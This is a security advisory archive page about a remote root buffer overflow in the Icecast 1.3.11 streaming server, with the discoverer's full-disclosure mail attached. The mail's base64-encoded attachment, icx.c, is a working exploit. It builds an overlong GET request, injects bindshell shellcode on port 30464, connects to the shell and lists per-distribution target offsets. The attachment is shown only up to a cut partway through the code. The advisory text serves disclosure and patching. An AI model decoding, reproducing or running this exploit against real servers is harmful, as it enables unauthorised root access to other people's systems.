SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Icecast Vendors:   Icecast.org
Icecast MP3 Streaming Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server, Usually With Root Level Privileges
SecurityTracker Alert ID:  1003952
SecurityTracker URL:  http://securitytracker.com/id/1003952
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 3 2002
Impact:   Execution of arbitrary code via network, Root access via network, User access via network
Exploit Included:  Yes  
Version(s): 1.3.11 and prior versions
Description:   A vulnerability was reported in the Icecast audio streaming server. A remote user can execute arbitrary code on the server, generally with root level permissions.

A remote user can reportedly trigger a buffer overflow in the Icecast server. This will apparently yield root level access if the Icecast server is run as root, as many users apparently do. Otherwise, this will apparently yield user-level access.

A remote user can create a specially crafted URL to trigger the overflow, which reportedly exists in the client_login() function. According to the report, another buffer overflow may also exist in the icecast extract_vars() function, as well as some libavl routines, but these have not been confirmed.

Demonstration exploit code is provided in the Source Message [it is Base64 encoded].

The vendor has reportedly been notified.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the Icecast server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.icecast.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Patch) Re: Icecast MP3 Streaming Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server, Usually With Root Level Privileges
The vendor has issued a patch.
(Red Hat Issues Fix) Icecast MP3 Streaming Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server, Usually With Root Level Privileges
The vendor has released a fix for Red Hat Powertools.
(Caldera Issues Fix) Icecast MP3 Streaming Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server, Usually With Root Level Privileges
The vendor has released a fix.



 Source Message Contents

Subject:  icecast 1.3.11 remote shell/root exploit - #temp


--Hushpart_boundary_WMIWgJJQzBwtmTQMmAPDZtuHzbKojelg
Content-type: text/plain

Ola,

I'm feeling rather homicidal today so I'm killing a bug. I hope it has a 
nice funeral. It has been a good friend to all of us. May it rest in peace.

There is a remotely exploitable buffer overflow in all versions of the Icecast 
mp3 streaming server (www.icecast.org). All means that yes, the current 
version (1.3.11) is vulnerable. Apparently alot of people can't be bothered 
to set the perms on the icecast log dirs right and just run it as root. 
Hence the designation remote shell/root. If not running with uid 0 it will 
yield a shell with the uid/gid of the icecast user.

The vendor has been notified via a cc of this mail. Fixing is easy so I 
expect they will release patches shortly. 

See the attached exploit (icx.c) for further details.

diz -- #temp

eww..so that's what full disclosure feels like...
--Hushpart_boundary_WMIWgJJQzBwtmTQMmAPDZtuHzbKojelg
Content-Disposition: attachment
Content-type: application/octet-stream; name="icx.c"
Content-Transfer-Encoding: base64

LyogIGFsbCBjb250ZW50IGlzIChjKSAjdGVtcCAyMDAyIGFuZCBtYXkgbm90IGJlCiAq
ICAocmUpcHVibGlzaGVkIGluIGFueSBmb3JtIG9yIChyZSlkaXN0cmlidXRlZCAKICog
IHdpdGhvdXQgd3JpdHRlbiBwZXJtaXNzaW9uIG9mIHRoZSBhdXRob3IgKGRpeikgCiAq
CiAqIAogKiAJaWN4LmMgLS0gaWNlY2FzdCByZW1vdGUgc2hlbGwvcm9vdCAgCiAqCiAq
CiAqIEZvdW5kIDE1LTAyLTIwMDIuLi5leHBsb2l0ZWQgMTYtMDItMjAwMiA7UAkKICoK
ICogQWZmZWN0ZWQ6CiAqICBhbGwgdmVyc2lvbnMgdXAgdG8gMS4zLjExIChjdXJyZW50
KSAKICogCiAqIHRoZSBjbGllbnRfbG9naW4oKSBmdW5jdGlvbiBpcyBwYXNzZWQgdGhl
IGZ1bGwgR0VUICVzIEhUVFAvMS4wCiAqIHN0cmluZyBwcm92aWRlZCBieSBhIG1wMyBj
bGllbnQuIFNvbWV3aGVyZSBhbG9uZyB0aGUgd2F5IGFuIGV2aWwgCiAqIHN0cmluZyBm
dW5jdGlvbiBvdmVyZmxvd3MgYnVmZmVyIGJvdW5kcyB3aXRoIG91ciBodW1wYWdlLi4g
V2UgY2FuIAogKiBvdmVyZmxvdyBqdXN0IGVub3VnaCB0byByZWFjaCBhbmQgb3Zlcndy
aXRlIGFuIGluc3RydWN0aW9uIHBvaW50ZXIuIAogKiBIdW1wYWdlIG9jY3VycyBzb21l
d2hlcmUgaW4gdGhlIGhhbmRsaW5nIG9mIHRoZSByZXF1ZXN0IHN0cmluZwogKiBiZXR3
ZWVuIG1vdW50IHNlYXJjaGluZyBhbmQgcmVxdWVzdCBidWlsZGluZy4uLkhhdmVudCBi
ZWVuIGFibGUKICogdG8gbG9jYXRlIHRoZSBleGFjdCBzcG90IGFzIG9mIHlldCAoanVz
dCBkaXNjb3ZlcmVkIGJ1ZyB5ZXN0ZXJkYXkgCiAqIGludmVzdGlnYXRpbmcgYW5vdGhl
ciBwb3NzaWJsZSBvdmVyZmxvdyBpbiBpY2VjYXN0IGV4dHJhY3RfdmFycygpIAogKiBm
dW50aW9uKSBBbHNvIHNvbWUgbGliYXZsIHJvdXRpbmVzIGxvb2sgbWlnaHR5IGd1aWx0
eS4uZXNwZWNpYWxseSAKICogYXZsX2Rlc3Ryb3kuIEkgY2FudCByZWFsbHkgYmUgYm90
aGVyZWQgdG8gY2hlY2sgYWxsIGVudHJ5IHBvaW50cy4gCiAqCiAqIFRoaXMgaXMgd2h5
OgogKgogKiByb290QGJsYWNrb3V0Oi9ob21lL2Rpei9hdWRpdHMvaWNlY2FzdC0xLjMu
MTEvc3JjID4gZ3JlcCBzdHJjcHkgYWxsLmMgfCB3YyAtdwogKiAgICAyODQKICogcm9v
dEBibGFja291dDovaG9tZS9kaXovYXVkaXRzL2ljZWNhc3QtMS4zLjExL3NyYyA+IGdy
ZXAgc3ByaW50ZiBhbGwuYyB8IHdjIC13CiAqICAgIDU2OAogKiByb290QGJsYWNrb3V0
Oi9ob21lL2Rpei9hdWRpdHMvaWNlY2FzdC0xLjMuMTEvc3JjID4gZ3JlcCBzdHJjYXQg
YWxsLmMgfCB3YyAtdwogKiAgICAgNjgKICogcm9vdEBibGFja291dDovaG9tZS9kaXov
YXVkaXRzL2ljZWNhc3QtMS4zLjExL3NyYyA+ICAgICAgICAgICAgICAgICAgICAKICoK
ICoKICogQSBxdWljayBhbmQgZGlydHkgcGF0Y2ggaXMgdG8gY2hlY2sgYW5kIG1ha2Ug
c3VyZSB0aGUgbGVuZ3RoIG9mIGV4cHIgZG9lcyBub3QKICogc3VycGFzcyA4MDAwIGJ5
dGVzIGFsYSBpbiBjbGllbnRfbG9naW4oKSBpbiAvc3JjL2NsaWVudC5jIGFuZCByZWNv
bXBpbGU6CiAqIAogKiAvLyBkaXJ0eSBmaXgKICogaWYoc3RybGVuKGV4cHIpID4gODAw
MCkgCiAqCXJldHVybjsKICogLy8gZW5kIG9mIGRpcnR5IGZpeAogKgogKiBXaGF0IGNh
biB3ZSBkbzoKICoKICogV2UgY2FuIGVpdGhlciBvdmVyd3JpdGUgYSBmcmFtZXBvaW50
ZXIgYW5kIG1ha2UgdGhlIHByb2Nlc3MgcG9wIGFuIAogKiBpbnN0cnVjdGlvbiBwb2lu
dGVyIG91dCBvZiBtZW1vcnkgd2UgY29udHJvbC4gT3Igb3ZlcmZsb3cgZWlwIGRpcmVj
dGx5LiAKICogCiAqIFdlIGdvIGZvciB0aGUgZGlyZWN0IGVpcCBodW1wKHRtKQogKgog
KiBGb3IgZnJhbWVwb2ludGVyIGh1bXBhZ2U6CiAqCiAqIEZpbmRpbmcgdGhlIGFkZHJl
c3MgdG8gb3ZlcmZsb3cgZWJwIHdpdGggdG8gbWFrZSBlc3AKICogcG9pbnQgaW50byB0
aGUgc3RhcnQgb2Ygb3VyIGJ1ZmZlciBpcyBlYXN5Li5qdXN0IGdkYiB0aGUKICogdGFy
Z2V0IHBsYXRmb3JtIGljZWNhc3QgYmluYXJ5IGFuZCBzZXQgYSBicmVha3BvaW50IGlu
CiAqIHRoZSBjbGllbnRfbG9naW4oKSBmdW5jdGlvbi4ub3V0cHV0IHdpbGwgYmUgbGlr
ZSB0aGlzCiAqCiAqIC4uLgogKiAgQnJlYWtwb2ludCAxLCAweDgwNGFmNDkgaW4gY2xp
ZW50X2xvZ2luIChjb249MHg4MDhkMGYwLCBleHByPTB4YmYzZmRhZjQKICogICJHRVQg
IiwgJ3gnIDxyZXBlYXRzIDE5NiB0aW1lcz4uLi4pIGF0IGNsaWVudC5jOjk3CiAqICA5
NyAgICAgIHZvaWQgY2xpZW50X2xvZ2luKGNvbm5lY3Rpb25fdCAqY29uLCBjaGFyICpl
eHByKQogKiAuLi4KICoKICogZXhwciBpcyBhIHBvaW50ZXIgdG8gb3VyIG9yaWdpbmFs
IHN0cmluZy4uc28gd2Uga25vdyB0aGF0CiAqIGlzIHRoZSBzdGFydCBvZiBvdXIgc3Ry
aW5nIGluIG1lbW9yeS4gTHVjayB3b3VsZCBoYXZlIGl0IHdlIGNhbiBqdXN0IAogKiB1
c2UgdGhhdCBleGFjdCBhZGRyZXNzIGFuZCB3aXRoIHBvcCBpbmNyZW1lbnRpbmcgaXQg
d29ya3Mgb3V0CiAqIHRvIGJlIGNvcnJlY3QgYW5kIHBvaW50IHRvIHRoZSBzdGFydCBv
ZiBvdXIgZWlwIGJ5dGVzIDopCiAqIG9yIGludG8gbm9wcyBvbiBhIG5vcm1hbCBvdmVy
Zmxvdy4gKHdoaWNoIHdlIHdpbGwgYmUgZG9pbmcpCiAqCiAqICEhISBBdHRlbnRpb246
CiAqCiAqIFdoZW4gd2UganVzdCBnbyBmb3IgZWlwIGluIG9uZSBnbyB3ZSBhbHNvIG5l
ZWQgdGhpcyBhZGRyZXNzIGJlY2F1c2UKICogaWNlY2FzdCB3aWxsIG9ubHkgZ2l2ZSB1
cyBvbmUgZ28gOiggc28gd2UgY2FuJ3Qgb2Zmc2V0IGFuZCBicnV0ZSBpdAogKiBhbGx0
aG91Z2ggd2UgQ0FOIHBhZCB3aXRoIDcwMDArIG5vcHMuLnNvIGZpbmRpbmcgYSBkZWNl
bnQgb25lIGdvCiAqIGNvbXByb21pc2Ugc2hvdWxkbnQgYmUgdGhhdCBtdWNoIG9mIGEg
cHJvYmxlbSA6KQogKgogKiAJCQlkaXogLSAjdGVtcAogKgogKiBzcGVjaWFsIHdvcmQg
dG8gcGlwIGFuZCBibGluayBmb3IgaGVscGluZyBtZSBnYXRoZXIgZXhwciBhZGRyZXNz
ZXMKICogCiAqIHdvcmQgdG86IGVyaWMsIG4wYjBkeSwgbXVza2EsIGFsY2Fwb25lLCBz
aiwgcHJpbWFsdXgsIHZvbmd1YXJkCiAqIAkJa2hyb215LCBqZXNzZTY2NiBhbmQgcjBz
cwogKiAKICogISEhIEEgYmlnICJ3ZSBob3BlIGxlcHJvc3kgc3RyaWtlcyB0aGVlIGRv
d24hIiB0byAyNjAwLm5ldCAhISEKICoKICogdG8gY29tcGlsZSBzdGFuZGFyZCBvdmVy
ZmxvdyBzcGxvaXQ6IGdjYyBpY3guYyAtbyBpY3ggCiAqIHRvIGNvbXBpbGUgZnJhbWVw
b2ludGVyIG92ZXJmbG93IHNwbG9pdDogZ2NjIGljeC5jIC1vIGljeCAtREZQTwogKgog
KiBub3RlOiBmb3IgcHJhY3RpY2FsIGV4cGxvaXQgdXNhZ2UganVzdCB1c2Ugc3RhbmRh
cmQgbW9kZQogKiBmcmFtZXBvaW50ZXIgYml0cyBhcmUgbGVmdCBpbiBjdXogSW0gdG95
aW5nIHdpdGggdGhlbQogKgogKiAJdGhpcyB2ZXJzaW9uIGlzIG1lYW50IGZvciBsaW51
eCB4ODYgdGFyZ2V0cyAKICoKICogICAgIFBBVENIRVMhPyE/ISBXRSBET04nVCBORUVE
IE5PIFNUSU5LSU4gUEFUQ0hFUyEhIQogKi8KCi8qCgpyb290QGJsYWNrb3V0Oi91c3Iv
bG9jYWwvaWNlY2FzdC9iaW4gPiAuL2ljZWNhc3QKSWNlY2FzdCBWZXJzaW9uIDEuMy4x
MSBJbml0aWFsaXppbmcuLi4KSWNlY2FzdCBjb21lcyB3aXRoIE5PIFdBUlJBTlRZLCB0
byB0aGUgZXh0ZW50IHBlcm1pdHRlZCBieSBsYXcuCllvdSBtYXkgcmVkaXN0cmlidXRl
IGNvcGllcyBvZiBJY2VjYXN0IHVuZGVyIHRoZSB0ZXJtcyBvZiB0aGUKR05VIEdlbmVy
YWwgUHVibGljIExpY2Vuc2UuCkZvciBtb3JlIGluZm9ybWF0aW9uIGFib3V0IHRoZXNl
IG1hdHRlcnMsIHNlZSB0aGUgZmlsZSBuYW1lZCBDT1BZSU5HLgpTdGFydGluZyB0aHJl
YWQgZW5naW5lLi4uClsxNi9GZWIvMjAwMjoxNTozOTozM10gSWNlY2FzdCBWZXJzaW9u
IDEuMy4xMSBTdGFydGluZy4uClsxNi9GZWIvMjAwMjoxNTozOTozM10gU3RhcnRpbmcg
QWRtaW4gQ29uc29sZSBUaHJlYWQuLi4KLT4gWzE2L0ZlYi8yMDAyOjE1OjM5OjMzXSBT
dGFydGluZyBtYWluIGNvbm5lY3Rpb24gaGFuZGxlci4uLgotPiBbMTYvRmViLzIwMDI6
MTU6Mzk6MzNdIExpc3RlbmluZyBvbiBwb3J0IDgwMDAuLi4KLT4gWzE2L0ZlYi8yMDAy
OjE1OjM5OjMzXSBMaXN0ZW5pbmcgb24gcG9ydCA4MDAxLi4uCi0+IFsxNi9GZWIvMjAw
MjoxNTozOTozM10gVXNpbmcgJ2JsYWNrb3V0JyBhcyBzZXJ2ZXJuYW1lLi4uCi0+IFsx
Ni9GZWIvMjAwMjoxNTozOTozM10gU2VydmVyIGxpbWl0czogOTAwIGNsaWVudHMsIDkw
MCBjbGllbnRzIHBlciAKc291cmNlLCAxMCBzb3VyY2VzLCA1IGFkbWlucwotPiBbMTYv
RmViLzIwMDI6MTU6Mzk6MzNdIFdXVyBBZG1pbiBpbnRlcmZhY2UgYWNjZXNzaWJsZSBh
dCAKaHR0cDovL2JsYWNrb3V0OjgwMDAvYWRtaW4KLT4gWzE2L0ZlYi8yMDAyOjE1OjM5
OjMzXSBTdGFydGluZyBDYWxlbmRlciBUaHJlYWQuLi4KLT4gWzE2L0ZlYi8yMDAyOjE1
OjM5OjMzXSBTdGFydGluZyBVRFAgaGFuZGxlciB0aHJlYWQuLi4KLT4gWzE2L0ZlYi8y
MDAyOjE1OjM5OjMzXSBTdGFydGluZyByZWxheSBjb25uZWN0b3IgdGhyZWFkLi4uCi0+
IC0+IFsxNi9GZWIvMjAwMjoxNTozOTozM10gW0JhbmR3aWR0aDogMC4wMDAwMDBNQi9z
XSBbU291cmNlczogMF0gCltDbGllbnRzOiAwXSBbQWRtaW5zOiAxXSBbVXB0aW1lOiAw
IHNlY29uZHNdCi0+IAoKLy8gdGhpcyB3YXMgYSB0YXJnZXQgY29tcGlsZWQgZnJvbSBz
b3VyY2Ugb24gbXkgbWFjaGluZQoKZGl6QGJsYWNrb3V0On4vY29kZS9kaXpjb2RlID4g
Li9pY3ggLWggYmxhY2tvdXQgLXAgODAwMCAtYiAweGJmM2ZkYWY0IC1hIDEgClsgaWN4
IC0tIGljZWNhc3QgaHVtcGFnZSAtLSBkaXogKCN0ZW1wKSBdCiEgcmVzb2x2aW5nIHNl
cnZlcjogYmxhY2tvdXQKISBjb21waWxlZCBhcyBzdGFuZGFyZCBvdmVyZmxvdyB2ZXJz
aW9uCiEgdXNpbmcgMHhiZjNmZGI1OCBhcyBlaXAgYWRkcmVzcwohIHNlbmRpbmcgc3Ry
aW5nCiEgZ2l2aW5nIHJlbW90ZSB0aW1lIHRvIHNldHVwIHNob3AuLi56enoKISBhdHRl
bXB0aW5nIHRvIGNvbm5lY3QgdG8gYmluZHNoZWxsCiEgY29ubmVjdGVkIHRvIHJlbW90
ZSBzaGVsbCA6KQokIGlkCnVpZD0wKHJvb3QpIGdpZD0wKHJvb3QpIGdyb3Vwcz0wKHJv
b3QpLDEoYmluKSwxNCh1dWNwKSwxNShzaGFkb3cpLDE2KGRpYWxvdXQpLDE3KGF1ZGlv
KSwzMyh2aWRlbyksNjU1MzQobm9ncm91cCkKJCBleGl0CiEgZG9uZQpkaXpAYmxhY2tv
dXQ6fi9jb2RlL2RpemNvZGUgPiAKCiovCgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1
ZGUgPHN0cmluZy5oPgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxzdGRsaWIu
aD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgoj
aW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8bmV0ZGIuaD4KI2luY2x1ZGUg
PGVycm5vLmg+CgojZGVmaW5lIEFMTElHTgkwCiNkZWZpbmUgTk9QCTB4OTAKCiNkZWZp
bmUgU1RSSU5HIAkiR0VUICVzJXMgSFRUUC8xLjBcblxuIiAKCmNoYXIgYWxsaWduYnVm
WzRdOyAKY2hhciBvdXRidWZbODIwNl07IApjaGFyIG5vcGJ1Zls1MTJdOyAKCiNpZmRl
ZiBGUE8KY2hhciBodW1wYnVmWzgxODJdOyAvLyA4MTgxIGJ5dGVzIHRvIGhpdCBlYnAK
I2Vsc2UKY2hhciBodW1wYnVmWzgxODZdOyAvLyA4MTg1IGJ5dGVzIHRvIG92ZXJ3cml0
ZSBlYnAgYW5kIGVpcCAoIG1pbnVzIDQgZm9yIEJTRCBob3N0cykKI2VuZGlmCgpjaGFy
IGNvZGVbXSA9IAoJLy8gdGFlaG8gb2ggYmluZHNoZWxsIGNvZGUgLS0gYmluZHMgdG8g
cG9ydCAzMDQ2NAoJIlx4MzFceGMwXHhiMFx4MDJceGNkXHg4MFx4ODVceGMwXHg3NVx4
NDNceGViXHg0M1x4NWVceDMxXHhjMCIKICAJIlx4MzFceGRiXHg4OVx4ZjFceGIwXHgw
Mlx4ODlceDA2XHhiMFx4MDFceDg5XHg0Nlx4MDRceGIwXHgwNiIKICAJIlx4ODlceDQ2
XHgwOFx4YjBceDY2XHhiM1x4MDFceGNkXHg4MFx4ODlceDA2XHhiMFx4MDJceDY2XHg4
OSIKICAJIlx4NDZceDBjXHhiMFx4NzdceDY2XHg4OVx4NDZceDBlXHg4ZFx4NDZceDBj
XHg4OVx4NDZceDA0XHgzMSIKICAJIlx4YzBceDg5XHg0Nlx4MTBceGIwXHgxMFx4ODlc
eDQ2XHgwOFx4YjBceDY2XHhiM1x4MDJceGNkXHg4MCIKICAJIlx4ZWJceDA0XHhlYlx4
NTVceGViXHg1Ylx4YjBceDAxXHg4OVx4NDZceDA0XHhiMFx4NjZceGIzXHgwNCIKICAJ
Ilx4Y2RceDgwXHgzMVx4YzBceDg5XHg0Nlx4MDRceDg5XHg0Nlx4MDhceGIwXHg2Nlx4
YjNceDA1XHhjZCIKICAJIlx4ODBceDg4XHhjM1x4YjBceDNmXHgzMVx4YzlceGNkXHg4
MFx4YjBceDNmXHhiMVx4MDFceGNkXHg4MCIKICAJIlx4YjBceDNmXHhiMVx4MDJceGNk
XHg4MFx4YjhceDJmXHg2Mlx4NjlceDZlXHg4OVx4MDZceGI4XHgyZiIKICAJIlx4NzNc
eDY4XHgyZlx4ODlceDQ2XHgwNFx4MzFceGMwXHg4OFx4NDZceDA3XHg4OVx4NzZceDA4
XHg4OSIKICAJIlx4NDZceDBjXHhiMFx4MGJceDg5XHhmM1x4OGRceDRlXHgwOFx4OGRc
eDU2XHgwY1x4Y2RceDgwXHgzMSIKICAJIlx4YzBceGIwXHgwMVx4MzFceGRiXHhjZFx4
ODBceGU4XHg1Ylx4ZmZceGZmXHhmZiI7CgoKc3RydWN0IGluZm8gewoJY2hhciAqaG9z
dDsKCWNoYXIgKmlwOwoJaW50IHBvcnQ7CglpbnQgYWxsaWduOwoJdV9sb25nIGFkZHJl
c3M7Cn0gaWN4OwoKdm9pZCB0eXBlKGludCB0eXBlKTsKdm9pZCBoYW5kbGVzaGVsbChp
bnQgc29jayk7CgppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpCnsKCXN0cnVj
dCBzb2NrYWRkcl9pbiBzbHV0OwoJc3RydWN0IGhvc3RlbnQgKmlwOwoJaW50IHMsIGIs
IGxlbiA9IDAsIGk7Cgl1X2ludCB3WzRdLCBlaXBbNF07CgljaGFyICp0ZW1wLCBjOwkK
CQoJaWYoYXJnYyA9PSAxKSB7CgkJZnByaW50ZihzdGRlcnIsICJVc2FnZTogJXMgLWgg
PGhvc3Q+IC1wIDxpY2VjYXN0IHBvcnQ+IFsgLXQgPHR5cGU+IF0gT1IgWyAtYSA8YWxs
aWduPiAgLWIgPGFkZHJlc3Mgb2YgKmV4cHI+IF1cbiIsIGFyZ3ZbMF0pOwoJCWZwcmlu
dGYoc3RkZXJyLCAiXG5UeXBlcyBhcmUgKGxpbnV4IHZlcnNpb24pOlxuXG4iKTsKCQlm
cHJpbnRmKHN0ZGVyciwgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLVxuIik7CgkJZnByaW50ZihzdGRlcnIsICIoMSkgU3VTRSA3LjIg
aWNlY2FzdCAxLjMuMTAgKHJwbSlcbiIpOwoJCWZwcmludGYoc3RkZXJyLCAiKDIpIGRl
YmlhbiAyLjIucjIgc2lkIGljZWNhc3QgMS4zLjExIChkZWIpXG4iKTsKCQlmcHJpbnRm
KHN0ZGVyciwgIigzKSBzbGFja3dhcmUgOC4wLjAgKOV0dGEpIGljZWNhc3QgMS4zLjEx
ICh0Z3opXG4iKTsKCQlmcHJpbnRmKHN0ZGVyciwgIi0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuXG4iKTsKCQlmcHJpbnRmKHN0ZGVy
ciwgIlsgIHJlYWQgY29tbWVudHMgb24gaG93IHRvIGFxdWlyZSBuZXcgdGFyZ2V0cyAg
XVxuXG4iKTsKCQlleGl0KDEpOwoJfQoJCglmcHJpbnRmKHN0ZGVyciwgIlsgaWN4IC0t
IGljZWNhc3QgaHVtcGFnZSAtLSBkaXogKCN0ZW1wKSBdXG4iKTsKCgkvLyBkZWZhdWx0
IGFsbGlnbgoJaWN4LmFsbGlnbiA9IEFMTElHTjsKCQoJCgl3aGlsZSgoYyA9IGdldG9w
dChhcmdjLCBhcmd2LCAiaDpwOmE6Yjp0OiIpKSAhPSBFT0YpIHsKCQlzd2l0Y2goYykg
ewoJCQljYXNlICdoJzoKCQkJCWljeC5ob3N0ID0gb3B0YXJnOwoJCQkJYnJlYWs7CgkJ
CWNhc2UgJ3AnOgoJCQkJaWN4LnBvcnQgPSBhdG9pKG9wdGFyZyk7CgkJCQlicmVhazsK
CQkJY2FzZSAnYic6CgkJCQlzc2NhbmYob3B0YXJnLCAiJXAiLCAmdGVtcCk7CgkJCQlp
Y3guYWRkcmVzcyA9IChsb25nKXRlbXA7CgkJCQlicmVhazsKCQkJY2FzZSAnYSc6CgkJ
CQlpY3guYWxsaWduID0gYXRvaShvcHRhcmcpOwoJCQkJYnJlYWs7CgkJCWNhc2UgJ3Qn
OgoJCQkJdHlwZShhdG9pKG9wdGFyZykpOwoJCQkJYnJlYWs7CgkJCWRlZmF1bHQ6CgkJ
CQlmcHJpbnRmKHN0ZGVyciwgIiEgaHVoID9cbiIpOwoJCQkJZXhpdCgxKTsKCQl9Cgl9
CgkKCWZwcmludGYoc3RkZXJyLCAiISByZXNvbHZpbmcgc2VydmVyOiAlc1xuIiwgaWN4
Lmhvc3QpOwoKICAgICAgICBpZigoaXAgPSBnZXRob3N0YnluYW1lKGljeC5ob3N0KSkg
PT0gTlVMTCkgewogICAgICAgICAgICAgICAgcGVycm9yKCIhIGdldGhvc3RieW5hbWUi
KTsKICAgICAgICAgICAgICAgIGV4aXQoMSk7CiAgICAgICAgfQoJCglpY3guaXAgPSAo
Y2hhciAqKWluZXRfbnRvYSgqKChzdHJ1Y3QgaW5fYWRkciAqKWlwLT5oX2FkZHIpKTsJ
CgogICAgICAgIHMgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIDApOwogICAg
ICAgIHNsdXQuc2luX2ZhbWlseSA9IEFGX0lORVQ7CiAgICAgICAgc2x1dC5zaW5fcG9y
dCA9IGh0b25zKGljeC5wb3J0KTsKICAgICAgICBzbHV0LnNpbl9hZGRyLnNfYWRkciA9
IGluZXRfYWRkcihpY3guaXApOwogICAgICAgIG1lbXNldCgmKHNsdXQuc2luX3plcm8p
LCAnXDAnLCA4KTsKCgoJLy8gc2V0dGluZyBvdmVyZmxvdyBhZGRyZXNzCgoJI2lmZGVm
IEZQTwoKCWljeC5hZGRyZXNzICs9IGljeC5hbGxpZ247CQoJCgkjZWxzZQoJCglpY3gu
YWRkcmVzcyArPSAxMDA7IC8vIHBvaW50aW5nIGludG8gbm9wcyBpbiAqZXhwcgoJCgkj
ZW5kaWYgCgoJI2lmZGVmIEZQTwoJCglmcHJpbnRmKHN0ZGVyciwgIiEgY29tcGlsZWQg
YXMgZnJhbWUgcG9pbnRlciBvdmVyZmxvdyB2ZXJzaW9uXG4iKTsKCWZwcmludGYoc3Rk
ZXJyLCAiISB1c2luZyAweCVseCBhcyBlYnAgYWRkcmVzc1xuIiwgaWN4LmFkZHJlc3Mp
OwoKCSNlbHNlCgkKCWZwcmludGYoc3RkZXJyLCAiISBjb21waWxlZCBhcyBzdGFuZGFy
ZCBvdmVyZmxvdyB2ZXJzaW9uXG4iKTsJCglmcHJpbnRmKHN0ZGVyciwgIiEgdXNpbmcg
MHglbHggYXMgZWlwIGFkZHJlc3NcbiIsIGljeC5hZGRyZXNzKTsKCQoJI2VuZGlmIAoJ
CgkvLyBzb3J0IG91dCBvdmVyZmxvdyBieXRlcwoJd1swXSA9IChpY3guYWRkcmVzcyAm
IDB4MDAwMDAwZmYpOwogICAgICAgIHdbMV0gPSAoaWN4LmFkZHJlc3MgJiAweDAwMDBm
ZjAwKSA+PiA4OwogICAgICAgIHdbMl0gPSAoaWN4LmFkZHJlc3MgJiAweDAwZmYwMDAw
KSA+PiAxNjsKICAgICAgICB3WzNdID0gKGljeC5hZGRyZXNzICYgMHhmZjAwMDAwMCkg
Pj4gMjQ7CgkKCQoJLy8gc2V0dGluZyB0aGUgZWlwIGFkZHJlc3MgbWFrZSBzdXJlIGl0
IHBvaW50cyBpbnRvIG5vcHMKCS8vIGFsbHRob3VnaCB0aGVyZSBhcmUgbm8gbm9wcyB0
byBwb2ludCBpbnRvIHlldC4uYmVoZQoJCgkjaWZkZWYgRlBPCgkKCWljeC5hZGRyZXNz
ICs9ICgxNiArIGljeC5hbGxpZ24gKyAxMDApOwoJCglmcHJpbnRmKHN0ZGVyciwgIiEg
dXNpbmcgMHglbHggYXMgZWlwIGFkZHJlc3NcbiIsIGljeC5hZGRyZXNzKTsKCQoJLy8g
c29ydCBvdXQgZWlwIHBvcCBieXRlcwoJZWlwWzBdID0gKGljeC5hZGRyZXNzICYgMHgw
MDAwMDBmZik7CiAgICAgICAgZWlwWzFdID0gKGljeC5hZGRyZXNzICYgMHgwMDAwZmYw
MCkgPj4gODsKICAgICAgICBlaXBbMl0gPSAoaWN4LmFkZHJlc3MgJiAweDAwZmYwMDAw
KSA+PiAxNjsKICAgICAgICBlaXBbM10gPSAoaWN4LmFkZHJlc3MgJiAweGZmMDAwMDAw
KSA+PiAyNDsKCQoJI2VuZGlmCgoJLy8gZmlsbCBub3AgYnVmZmVyCiAgICAgICAgbWVt
c2V0KCZub3BidWYsICdcMCcsIHNpemVvZihub3BidWYpKTsKICAgICAgICBmb3IoaSA9
IDA7IGkgPCBzaXplb2Yobm9wYnVmKTsgaSsrKQogICAgICAgICAgICAgICAgbm9wYnVm
W2ldID0gTk9QOwoKCS8vIGFsbGlnbgoJbWVtc2V0KCZhbGxpZ25idWYsICdcMCcsIHNp
emVvZihhbGxpZ25idWYpKTsKCWZvcihpID0gMDsgaSA8IGljeC5hbGxpZ24gJiYgaSA8
IHNpemVvZihhbGxpZ25idWYpOyBpKyspIAoJCWFsbGlnbmJ1ZltpXSA9ICd4JzsKCQoJ
bWVtc2V0KCZodW1wYnVmLCAnXDAnLCBzaXplb2YoaHVtcGJ1ZikpOwkKCgkjaWZkZWYg
RlBPCgkKCS8vIHBsYWNlIGVpcCByZWFkIGJ5dGVzIDQgdGltZXMKCWZvcihpID0gMCwg
YiA9IDA7IGkgPCAxNjsgaSsrLCBiKyspIHsKCQlpZihiID09IDQpIGIgPSAwOwoJCWh1
bXBidWZbaV0gPSAoY2hhcillaXBbYl07Cgl9CgkKCS8vIHNwcmludGYoJmh1bXBidWZb
MTZdLCAiJXMlcyIsIG5vcGJ1ZiwgY29kZSk7CgkKCSNlbHNlCgkKCXNwcmludGYoJmh1
bXBidWZbMF0sICIlcyVzIiwgbm9wYnVmLCBjb2RlKTsKCQoJI2VuZGlmCgkKCS8vIGZp
bGxpbmcgcmVzdCBvZiBzdHJpbmcgd2l0aCBnYXJiYWdlIGJ5dGVzCgkvLyBiZSBzdXJl
IHRvIHRha2UgdGhlIGxlbmd0aCBvZiBub3BzICsgc2hlbGxjb2RlCgkvLyBpbnRvIGFj
Y291bnQgd2hlbiB0aGUgc3RyaW5nIGNvbnRhaW5zIHRoZW0KCQoJI2lmZGVmIEZQTwoJ
CgkvLyEgZnAgcG9vcAoJZm9yKGkgPSAxNjsgaSA8IChzaXplb2YoaHVtcGJ1ZikgLSAx
